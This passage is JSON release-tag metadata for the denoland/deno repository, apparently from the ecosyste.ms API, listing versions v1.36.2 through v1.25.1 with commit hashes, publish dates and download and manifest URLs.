/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1